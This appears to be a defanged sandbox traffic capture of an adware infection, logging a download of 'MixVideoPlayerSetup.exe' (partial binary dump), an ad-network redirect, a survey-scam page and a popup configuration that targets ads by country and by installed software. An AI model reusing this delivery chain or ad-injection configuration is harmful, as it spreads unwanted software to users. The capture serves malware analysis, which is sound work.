Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.38

Set-Cookie: ce-visitor-iWZrnWWe=imGQ35nVft7DoIfXcOWwtoh4oNBn4XvekWaqzF6bepI; expires=Wed, 12-Aug-2015 05:46:32 GMT; path=/; domain=network.adsmarket.com

Set-Cookie: ce-click-iWRymmajfJe3Z2uZYqSAnIpq=iWRymmajfJe3Z2uZYqSAnIpq; expires=Mon, 29-Jun-2015 05:46:32 GMT; path=/; domain=network.adsmarket.com

Location: hXXp://VVV.webtrackerplus.com/?page=ec&a_aid=51ccedn87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.&ce_cid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000.
0..HTTP/1.1 302 Moved Temporarily..Server: nginx/1.6.2..Date: Sun, 28 
Jun 2015 05:46:32 GMT..Content-Type: text/html..Transfer-Encoding: chu
nked..Connection: keep-alive..X-Powered-By: PHP/5.4.38..Set-Cookie: ce
-visitor-iWZrnWWe=imGQ35nVft7DoIfXcOWwtoh4oNBn4XvekWaqzF6bepI; expires
=Wed, 12-Aug-2015 05:46:32 GMT; path=/; domain=network.adsmarket.com..
Set-Cookie: ce-click-iWRymmajfJe3Z2uZYqSAnIpq=iWRymmajfJe3Z2uZYqSAnIpq
; expires=Mon, 29-Jun-2015 05:46:32 GMT; path=/; domain=network.adsmar
ket.com..Location: hXXp://VVV.webtrackerplus.com/?page=ec&a_aid=51cced
n87de7&pubid=415891&prgid=152873&cpnid=1208733&clickid=20Wzkj4zkoNrBzf
R0Ggk9v1z95qg000.&ce_cid=20Wzkj4zkoNrBzfR0Ggk9v1z95qg000...0..

GET /sdb/84/MixVideoPlayerSetup.exe HTTP/1.1

Accept: */*

Proxy-Authorization: Basic 

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:46:27 GMT

Content-Type: application/octet-stream

Content-Length: 3687070

Last-Modified: Thu, 25 Jun 2015 08:15:55 GMT

Connection: keep-alive

ETag: "558bb8bb-38429e"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^..........^2.......p....@.........
.................`...............................................t....
......8...............................................................
.............p...............................text....].......^........
.......... ..`.rdata.......p.......b..............@[email protected]....\......
.....v..............@....ndata...................................rsrc.
..8............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>

GET /sdb/e0/WebBrowser.xml?73a627b4-0b69-4c55-b6a2-57d86b70d2fa HTTP/1.1

Host: staticrr.mixvideoplayer.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:47:21 GMT

Content-Type: text/xml

Content-Length: 4250

Last-Modified: Mon, 18 May 2015 14:02:04 GMT

Connection: keep-alive

ETag: "5559f0dc-109a"

Accept-Ranges: bytes
<Popup>..<Version>1.0.0.10</Version>.    <Enabled
>true</Enabled>..<Size height="768" width="1000"/>.    
<FrecuencyPerHour>3</FrecuencyPerHour>.    <MaxWindows&
gt;4</MaxWindows>.    <LaunchDate>07/01/2015</LaunchDat
e>.    <Url container="popup">hXXp://VVV.wbredirect.com</U
rl>..<UrlNotAllowedCountries countries="AE,IR,IL,EG,CN,BA,RS,TH,
IN,CZ,ID,VN,PH,PK" container="popup">hXXp://network.adsmarket.com/c
lick/jGJunWecqZmOZnCXYcp6w4iQa5xgn36bi2SYm2Gif5mJkGqXXpt-lbdia5hhn3qX&
lt;/UrlNotAllowedCountries>.    <UrlByRegister>...<Url con
tainer="browser" key="HKLM\SOFTWARE" priority="5"><![CDATA[http:
//n149adserv.com/ads?key=8a35d9a5b93c671dcef88419ab81871b&width=0&heig
ht=0]]></Url>...<Url container="browser" key="HKLM\SOFTWAR
E\Microsoft\Windows\CurrentVersion\Uninstall\TeamSpeak 3 Client" prior
ity="5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffce
ee148f60ea374f6&width=0&height=0]]></Url>...<Url container
="browser" key="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninsta
ll\RaidCall" priority="5"><![CDATA[hXXp://n149adserv.com/ads?key
=0d8448124f556ffceee148f60ea374f6&width=0&height=0]]></Url>..
.<Url container="browser" key="HKLM\SOFTWARE\Microsoft\Windows\Curr
entVersion\Uninstall\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}" priority=
"5"><![CDATA[hXXp://n149adserv.com/ads?key=0d8448124f556ffceee14
8f60ea374f6&width=0&height=0]]></Url>...<Url container
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/progress-bar.png HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/png

Date: Sun, 28 Jun 2015 05:46:27 GMT

ETag: "54f07a08-570"

Last-Modified: Fri, 27 Feb 2015 14:07:04 GMT

Server: nginx

Content-Length: 1392

Connection: keep-alive
.PNG........IHDR...|.........L.......tEXtSoftware.Adobe ImageReadyq.e&
lt;...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:15582AE06BF411E4901AB7
B77D879212" xmpMM:DocumentID="xmp.did:15582AE16BF411E4901AB7B77D879212
"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:24FEED896BEF11E4
901AB7B77D879212" stRef:documentID="xmp.did:24FEED8A6BEF11E4901AB7B77D
879212"/> </rdf:Description> </rdf:RDF> </x:xmpmeta&
gt; <?xpacket end="r"?>[email protected]~:52u.....,.g...e.
.<..l..F...|.E.....G....n..g......V..v.^.C..?... .........k..Bc.Y.V
....._....E.(...T.eR...`yn..i.{t...-{tB..{\5......y..s..4kyn<=\5.KV
:......u..l..QK.)z.n.........c......\....N.=EG..w..^.Xh......~....w...
>..S.dy.H.$5.@.^o..........t...5.N|...>....3..H.....(.3..`Ft....
......y..~8^...1OC..x....it&W@it..."..=^MV..WA.$.....W...D6.....v.y...
....Pis..2.W:..^..........-.lx>P......3$CR...}.<..5*......f,vl]c
.i...k...xN.|>o6......P......z..p8..cv.....o.....&..m.c....IEND.B`.
....
<<< skipped >>>

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: api.magnofiler.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/gif

Date: Sun, 28 Jun 2015 05:46:27 GMT

ETag: "54f07a05-12d72"

Last-Modified: Fri, 27 Feb 2015 14:07:01 GMT

Server: nginx

Content-Length: 77170

Connection: keep-alive
GIF89a|..............................c........"..y..4.....H.....i.....
/..1..2.....M.....W...........v...........-..u........0..1.. ..... ...
.....*.....!.....*.....,..{........z..s.....5........&.."..(..(..,..2.
.4..8..).. ..u..... ..$.....z..m...........*......../..*.....,........
...4..".....%..'.. ..............%........(../..............!.........
.....8.....&..3.....)..... ../........%..4.....!..NETSCAPE2.0.....!..X
MP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http:
//ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/s
Type/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" x
mpMM:InstanceID="xmp.iid:C7B15D6A6C0511E4901AB7B77D879212" xmpMM:Docum
entID="xmp.did:C7B15D6B6C0511E4901AB7B77D879212"> <xmpMM:Derived
From stRef:instanceID="xmp.iid:C7B15D686C0511E4901AB7B77D879212" stRef
:documentID="xmp.did:C7B15D696C0511E4901AB7B77D879212"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>................................................................
..................................................................~}|{
zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;
:9876543210/.-, *)('&%$#"! .................................!.....
<<< skipped >>>

GET /?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 8mdzz.exclusiverewards.7015.info

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Sun, 28 Jun 2015 05:46:35 GMT

Content-Type: text/html

Transfer-Encoding: chunked

X-Powered-By: HHVM/3.7.1-dev

Cache-Control: no-cache

Expires: Mon, 01 Jan 2001 00:00:00 GMT

X-Sov: 73001201

X-Rot: 227198

X-Source: Mini

Pragma: no-cache

Vary: Accept-Encoding

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

Set-Cookie: ci_session=MoMg5mPvtwd7eyN64guc0nuIl92MZZ/Sm6ZOBVWtMH03rnmP1Qd8RxHBrM071hCvOSUBHn+HXc1s/Nog0g9MvHZzZOaBei6Y+dUEKnxL80aCpz1U5nP438cHsHrNJaUtzgb8F2VLJMF4KKgW7i5LZXSV08INJtE6nYVemH8hjAHJB2JL5ITHuRK20pcxo581BQk8vt1ayWn0jrdiTaIYjNXQPT9wBX5yO/bvVK8KgT097C1jRs23IAExjG4eI+P1tmM/Rbv2V/C7cpPdfWCTtGeN/Z1caiLF1Akhh25xhkiECBnRkD783wTi8p3K16zkB95+7i39Zumlp/SYanUS2Wc6snGl+4zGxnnmZzl1iD+upjU4/cjMZ6UONfZa/lk7+pK8Sn0VAltvQzK00mllO2MkYo5jBYbkDMe9/9uS4VPZWDlFCzR2JABFZNx86kYr/2y/Q9doNtUewoU2RGklsQ==; expires=Mon, 29-Jun-2015 05:46:35 GMT; Max-Age=86400; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: id=XNSX.-r10845-t68; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: SITE_ID=73001201; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: sov=73001201; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: mov=nr.ytsurvey.mini; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: redid=10845; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: gsid=68; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: URI=sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: templateid=2582; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: version=227198; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[2582][expand_enable]=-1; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[2582][alert_enable]=1; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[2582][audio_enable]=0; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[2582][pop_enable]=0; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[227198][expand_enable]=-1; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[227198][alert_enable]=1; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[227198][audio_enable]=0; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[227198][pop_enable]=0; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: content=227198; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: token=89e5c9e45a40d7b233b9677d31c426dc; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: rpm=93; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: vid=42999; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: log_73001201=1; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.exclusiverewards.7015.info

Set-Cookie: id=XNSX.-r10845-t68; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: SITE_ID=73001201; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: sov=73001201; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tov=227198; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: mov=nr.ytsurvey.mini; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: redid=10845; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: gsid=68; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: tags[2582][iframe_enable]=0; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.8mdzz.exclusiverewards.7015.info

Set-Cookie: noshid=eoiekqisesiuiego; expires=Mon, 29-Jun-2015 05:48:15 GMT; Max-Age=86500; path=/; domain=.7015.info

Content-Encoding: gzip
e7c.............[{o....[....P..%YR.....k..H.d...h...(.1E.$....ytm...Px
.0.........y.y8.>....;.^R|Y....cS.....{..s8Q.|...k._^a..k.....;..u4
..4...&..V..-.}..B..&....=.j../....y_.\T..LW3...NOSXS|ZT\m.-.....QmGs.
.../.SX./....-y.x.... ....{..c.C....{..3.:..{....&n>......y.Xe.<
W ..h*.i.=.9vsQ)..k.vq....M..N.iu....7.......S*......T..f...,.Jb*>.
....ckmL.j.....S.c..e...[...r4....Mm..zq......W...W.V...}..6.....R.qJ.
.chE\)...E..v:..*...%......=FM...)...<'(? (/........"|..|M.T...y.c.
.50...?).F.f(.......1.WS-...BL..6.~g..7..n.lj..4"...{...S.....^....Vsc
*oZ8.r..eu]....4. ..E...h...W(.k.k....W..qu.....L..f.S..#...........P.
]......U 0(...P...m...H....-.-......!4u.y/.._c..'...wP..}.[....Q..;...
..5.x._.F..........k#n.M..... ...G.E.....v.O6...6....t..m.0.j[.amq.T I
.XkX.....=.>2......Z.&k...,*.....m}[k....%~..1.....]V....9zKk.6....
..H1W.v%...&'.........|[email protected]...(5.'...G.g[...E...>...
KB.#s...n1Ck...3F......p\.2...C 9.....>H_.S...i.t.(O..>a.M....z.
....w... ..-..PL..m../L........~.o....6)(.Z..oc.>........Z...e..;..
.....a..=).b...'"B)h....n........pb.{..f.n........fx...;.g..aP(...~B.$
..`........=...7..`.>..x .S..........]....Xm...6.....]..B......x.._
. ...U....-.......S|7.\`....7)...OiKD.S..b.b....b.....~..1..?..t.Iq..X
u.......=....3..l.-.F..&H{N..b...B `,L=....H...H...??...}.6... ..{?C^.
...&........em......Ltd ..e... ......u,Scs...bdX.y..N~..h..d.c. .).!b.
a.V.1... ^..@..!.B.&5.lF...-..Q........1.e.|..C.>......E%...g).\p'6
%[email protected]./...e....*..C..)GI.9.`%nf........$C-I.....KzEa...s
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/css/style.css HTTP/1.1

Accept: */*

Referer: hXXp://8mdzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 8mdzz.exclusiverewards.7015.info

Connection: Keep-Alive

Cookie: ci_session=MoMg5mPvtwd7eyN64guc0nuIl92MZZ/Sm6ZOBVWtMH03rnmP1Qd8RxHBrM071hCvOSUBHn+HXc1s/Nog0g9MvHZzZOaBei6Y+dUEKnxL80aCpz1U5nP438cHsHrNJaUtzgb8F2VLJMF4KKgW7i5LZXSV08INJtE6nYVemH8hjAHJB2JL5ITHuRK20pcxo581BQk8vt1ayWn0jrdiTaIYjNXQPT9wBX5yO/bvVK8KgT097C1jRs23IAExjG4eI+P1tmM/Rbv2V/C7cpPdfWCTtGeN/Z1caiLF1Akhh25xhkiECBnRkD783wTi8p3K16zkB95+7i39Zumlp/SYanUS2Wc6snGl+4zGxnnmZzl1iD+upjU4/cjMZ6UONfZa/lk7+pK8Sn0VAltvQzK00mllO2MkYo5jBYbkDMe9/9uS4VPZWDlFCzR2JABFZNx86kYr/2y/Q9doNtUewoU2RGklsQ==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; tags[227198][pop_
HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Sun, 28 Jun 2015 05:46:37 GMT

Content-Type: text/css

Last-Modified: Fri, 11 Oct 2013 18:30:45 GMT

Transfer-Encoding: chunked

Expires: Wed, 22 Jun 2016 05:46:37 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
9ec.............Z[o...~...5A1;.:.%.....L6.,....E.7..(..%*.............
l[`k#...9<......,....'...o.~u.v...7.....Td..<...>...9.E..@<
;.'...I.3..%J=..(.P.B...(d<zx.. .(....a.pT.|.!..%.*....(..xLPL.....
.%<.....y....=..U8 P.a.P%[email protected]. .....(D5.(". %.aM...q.j..E.%,.
`../3.p.d...<F.......<GB.]$..$R.....$b...].........]....N....I..
y-...~..ZT....]..7'.:9Q\.....S....<'............!...C..8..xl{.u.\'.
N@<....7.[.,.DI2..0\p'&.l.IxTW.......r.[^.}...t.2..........I..Z....
...EL"^b)}........B.%.wiKViP2I.srBb.}D....@A?.............Br.&I.Zu..3.
....>uj]4 .;.~..Y.sG:....sF.!.M...4..X9/......."F...|.vB....md..h.F
.-0..D......_..-.D.-UT.;..b....S)&.B..(._;.........yLNQ.........1.1rpI
1.?....hr#=.. m8Z.....!..v`'y|..%.....fxG....6.m3L...M>.......s.`..
.LpLB......x.3f4v......H%|.b...U.c..F..<........p...,.l.....Lc.....
zC..K......m......(..K.....u6k=..a..9Z.:=..j.....1.\.....f.Q.V.......^
N...U..q...f.8RN.......).J.r,j.......m..eOn.t>..gA....R......m.R...
.E...>..&....E.]6Zn.M..R-..8...:....u..._..C..s....b?,.s%......`.h.
vf!.........LnLs.J..F'..HG.......5.4f.C ......mo...7...r.....&..Z...;.
.d. oJ.z...F.L..'p.....E.e..q..ptP>.......]Mx.eK..&...*i...:...AZ~"
73......C....Smp..V3...C..ZHZ.........F.... ..G>..*..w.8A....(;ky]J
....Z.....&.)._.u.^....A..2Afo'm.6......3.Kg5^`....Z-..........F.".:.c
....=..G<.5a.3)..u.Gl%.......b_tP.....d^.N ...gO..........|..%.v;.J
&.......s...X. ....~.X.t=.....&..v.]'..J...6...../.$....K......-.r2 ..
.7.fn.GJYf...B..."..W....NZ.V....:5,2.m...l.hk..M.S..'.....;e. HRJ
<<< skipped >>>

GET /templates/_common/_templates/browser_survey_SMARTKEYS_MASTER_lightbox_UA/js/script.js HTTP/1.1

Accept: */*

Referer: hXXp://8mdzz.exclusiverewards.7015.info/?sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 8mdzz.exclusiverewards.7015.info

Connection: Keep-Alive

Cookie: ci_session=MoMg5mPvtwd7eyN64guc0nuIl92MZZ/Sm6ZOBVWtMH03rnmP1Qd8RxHBrM071hCvOSUBHn+HXc1s/Nog0g9MvHZzZOaBei6Y+dUEKnxL80aCpz1U5nP438cHsHrNJaUtzgb8F2VLJMF4KKgW7i5LZXSV08INJtE6nYVemH8hjAHJB2JL5ITHuRK20pcxo581BQk8vt1ayWn0jrdiTaIYjNXQPT9wBX5yO/bvVK8KgT097C1jRs23IAExjG4eI+P1tmM/Rbv2V/C7cpPdfWCTtGeN/Z1caiLF1Akhh25xhkiECBnRkD783wTi8p3K16zkB95+7i39Zumlp/SYanUS2Wc6snGl+4zGxnnmZzl1iD+upjU4/cjMZ6UONfZa/lk7+pK8Sn0VAltvQzK00mllO2MkYo5jBYbkDMe9/9uS4VPZWDlFCzR2JABFZNx86kYr/2y/Q9doNtUewoU2RGklsQ==; id=XNSX.-r10845-t68; SITE_ID=73001201; sov=73001201; mov=nr.ytsurvey.mini; redid=10845; gsid=68; URI=sov=73001201&hid=eoiekqisesiuiego&redid=10845&gsid=68&id=XNSX.-r10845-t68; templateid=2582; path=browser_survey_SMARTKEYS_MASTER_lightbox_UA; version=227198; tags[2582][expand_enable]=-1; tags[2582][alert_enable]=1; tags[2582][audio_enable]=0; tags[2582][pop_enable]=0; tags[227198][expand_enable]=-1; tags[227198][alert_enable]=1; tags[227198][audio_enable]=0; tags[227198][pop_e
HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Sun, 28 Jun 2015 05:46:37 GMT

Content-Type: application/javascript

Last-Modified: Fri, 11 Oct 2013 18:30:48 GMT

Transfer-Encoding: chunked

Expires: Wed, 22 Jun 2016 05:46:37 GMT

Cache-Control: max-age=31104000

Pragma: public

Cache-Control: public, must-revalidate, proxy-revalidate

Content-Encoding: gzip
9c0..............iw.6... .....LIv.m..]?'N.^.g7i..q.(..XS.J.>bi.....
.......$....`........} ....>..e.._.d...;.........v2xM.4..HY........
..w.h..}gCF...o.%........... S..,...2.....E.....$...q..lLD.\d..{....[.
...N.l....v..By...a.e<.D.[....'.i|6...z....x...u~.F..d..V*$..-....^
.-..Rj.cqU.{7 [email protected]..].$.5..7mc$./..)-..$...=..).....k...9Ox(...e..C
.z..&..\Y.\_.../..HQ....Q.GC.Ac...F..Qi.A.....i......|...Q..L\R. .J}l[
..=?...$.s.d....\s......c......@7^0...mD.X&.b.|.Ax>.D.FN.9.......-.
f..........D..SFf>.."....i...&..`E:..w..{.fd!.q.2...IP$.66."H.?. ..
_....'...%..........i...F .b.......g({....V.$B.d..1....3g..P........3.
.9..q...?.`!O,.<.R9lt..Y..p....Lb.D....%.1.P...h2...6.\>"..#....
.....A......8....U....)....$D.....L...8..9.J.8.{..K.%.[\..[.o...!]c.S;
m).[.Z.....)...m.p.\...T..#py..Q"......9..P..E..<..|.lS...]r$L.a...
= M....."......hV..mr..._U2.J<..f<...TJ.....H8..*"@L..m.]p.%...Y
8..1......E.Ji1. .F}..l/....EvlO.......P..Z..G.S....X..4...A;mv..e..G.
clV.TU..U...a.....!.`O.9..V....vVx..._.....B...8N.A=Vk......wY_......{
...1.....T..S2.r.......H......k..aytM..b...c<...6...ri1..A.V..^...V
T....q..'.6..L.C..p L....ZU ...)...h......~..nW..h9.s.e..F3.M...v.Z...
D...Z..;...(.t.......`A.. M.9...p..z..S(]y-.....@...._\.P.f.v6..1hTK.:
*..`.-7....{.CT..P..%j...m.b....;I.\...a..r.3.'...YG.Z.Wf.*z.F.^.%6..m
......S.....X.3.g.WB..S....t....'.....'...Pj..k....j.NV..eu....(..2T.b
.)[email protected]/j....a.....W.J./<...v..7....:;....MA........n.....p....@
..y7.dT..ts..R..8.....B.L;lA.F<m1U.ZN[.l;-.............W%..;:y.
<<< skipped >>>

HEAD /sdb/84/MixVideoPlayerSetup.exe HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36

Host: staticrr.mixvideoplayer.com

Content-Length: 0

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sun, 28 Jun 2015 05:46:27 GMT

Content-Type: application/octet-stream

Content-Length: 3687070

Last-Modified: Thu, 25 Jun 2015 08:15:55 GMT

Connection: keep-alive

ETag: "558bb8bb-38429e"

Accept-Ranges: bytes

GET /maxpower-static/templates/2014/11/71be70f4-73cf-11e4-b71d-06a3579b0dab/css/images/loadingBar.gif HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Range: bytes=46408-

